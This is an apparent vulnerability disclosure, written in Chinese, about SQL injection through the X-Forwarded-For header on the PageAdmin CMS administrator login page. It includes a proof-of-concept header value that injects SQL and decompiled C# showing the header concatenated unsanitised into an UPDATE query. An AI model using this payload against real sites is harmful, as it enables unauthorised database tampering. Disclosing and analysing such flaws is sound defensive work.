### 简要描述:
rt
### 详细说明:
管理员登陆处。
获得管理员登陆ip并记录,获得ip方式有问题。
x-forwarded-for注入。
```
http://bbs.pageadmin.net/showtopic-28377.aspx
```
20140415
本机测试,X-FORWARDED-FOR:8.8.8.8','20140721');
```
select * from pa_member where @@version>0 --
```
。
官网,demo改了登陆url.
/e/master/login.aspx
```
<% @ Page Language="c#" Inherits="PageAdmin.master_login"%>
```
看ilspy里面的PageAdmin master_login的SRDuaCUjVn函数,存在x-forwarded-for则记录,关键代码:
```
text = master_login.smnQ8wkbBIPFSYwavp0(this).ServerVariables["HTTP_X_FORWARDED_FOR"];
```
后续也没有做处理。
vCBu9t9Jd6():
```
this.cx1UsTbPYR = master_login.IJfrrCknPpUqP4RXYZs(new object[]
{
"update pa_member set lastdate='",
dateTime,
"',lst_ip='",
this.C40Uh8y68l,
"',beizhu='",
this.mHfUkK4Wdy,
"',logins=logins+1 where username='",
text,
"'"
});
```
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201407/21233433fd724aa27d4a08a6e4b95a3000e67b42.jpg" alt="0555.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/21233433fd724aa27d4a08a6e4b95a3000e67b42.jpg)
[<img src="https://images.seebug.org/upload/201407/212334530c1319c9b41c00370507dc17fe7d20e8.jpg" alt="0721.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/212334530c1319c9b41c00370507dc17fe7d20e8.jpg)
暂无评论